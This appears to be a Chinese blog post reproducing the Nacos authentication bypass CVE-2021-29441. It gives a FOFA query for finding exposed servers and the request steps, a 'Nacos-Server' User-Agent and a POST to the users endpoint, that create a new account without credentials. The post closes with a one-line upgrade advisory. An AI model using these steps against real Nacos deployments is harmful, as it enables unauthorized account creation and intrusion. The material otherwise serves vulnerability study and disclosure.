Nacos 身份验证绕过漏洞(CVE-2021-29441)

一、描述

nacos是阿里巴巴的一个开源项目,旨在帮助构建云原生应用程序和微服务平台,在早期低版本的Nacos中,当配置文件使用身份验证(Dnacos.core.auth.enabled=true)时候,会判断请求ua是否为"Nacos-Server",如果是的话则不进行任何认证

二、资产测绘

fofa:title=“nacos”
在这里插入图片描述

三、影响版本

Nacos <= 2.0.0-ALPHA.1

四、漏洞复现

1、访问/nacos/v1/auth/users?pageNo=1&pageSize=9验证漏洞是否存在
1、将UA改为:Nacos-Server
2、POST方法提交
3、POST /nacos/v1/auth/users?username=test&password=test HTTP/1.1

1、访问/nacos/v1/auth/users?pageNo=1&pageSize=9验证漏洞是否存在
在这里插入图片描述

在这里插入图片描述
2、创建用户
在这里插入图片描述
使用账号登录系统
在这里插入图片描述

五、修复建议

升级到最新版nacos

正在学习网络安全的小伙伴,有需要安全资料或者CISP资料的可以关注安全技术达人公众号,后期回不断分享安全知识,回复“学习资料”可领取网络安全书籍。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值